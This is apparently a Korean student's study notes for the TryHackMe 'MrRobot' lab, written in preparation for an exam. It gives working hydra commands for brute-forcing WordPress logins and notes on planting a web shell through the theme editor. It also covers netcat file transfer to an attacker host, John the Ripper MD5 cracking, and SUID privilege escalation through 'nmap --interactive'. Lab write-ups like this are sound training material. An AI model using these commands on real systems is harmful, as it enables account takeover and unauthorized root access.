[Linux] MrRobot

정보탐색

NMAP, WpScan, Nikto

 

배운점

1. Recon할 때, nikto를 활용하는 점 잊지 말자

2. 로컬권한상승을 위해 취약점 탐색용으로 LinEnum 스크립트를 활용할 수 있다.

3. WPSCAN(xmlrpc 이용한 로그인 브루트포스를 지원한다.)

4. 터미널에서 export TERM=screen 입력하면 clear 명령어를 사용할 수 있다.

 

히드라(웹 폼 브루트포스)
- 성공,실패 메세지 유무를 통해 아이디 존재도 확인 가능함.

아이디 브루트 포싱(S:성공, F:실패시 메세지, 생략시 실패시 메세지)
hydra -L 파일명 -p qwerqweqwrqwe 아이피 -V http-form-post 'wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Login+In&testcookie=1:S=Location'
* 존재하는 계정에 대한 응답이 다를 경우, S값을 정의하여 정의된 아이디를 알아낼 수 있다.

비번 브루트 포싱
hydra -l elliot -P ./test.txt 아이피 -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Login+In&testcookie=1:incorrect'

 

워드프레스-웹쉘

- 에디터 페이지를 웹쉘 코드로 수정 후 active하여 접근

 

 

파일전송(netcat)

 

- 보내는 쪽

nc -nlvp 4444 > md5.txt(저장될 파일명 입력) 

- 받는 쪽

nc -nv 10.0.0.22 4444 < md5.txt (전송할 파일 리다이렉션으로 넘겨줌)

 

 

john the ripper 또는 hashcat

존더리퍼 왜 안되냥?
=> Raw-MD5를 Raw-MD5u로 수정하니까 됨.

./john --wordlist=/THM/MrRobot/fsocity.dic /THM/MrRobot/md5.txt --format=Raw-MD5u

 

=> 비밀번호 왜 틀리냐?
대문자로 출력되었지만 소문자로 입력하니까 성공함..
ㅅㅂ 불확실하니까... 시험때는 hashcat도 같이 사용하는게 좋을 것 같음

 

 

 

권한상승 suid

find / -perm -4000 2>/dev/null

 

nmap 발견
nmap --interactive
nmap> !sh

 

참고
https://gtfobins.github.io/gtfobins/nmap/

 

 

다른사람 권한상승
1. 로컬 웹서버 -> linEnum 스크립트 이동
2. 피해자 tmp에 LinEnum 스크립트 다운로드
3. suid 찾고 nmap으로 exploit 성공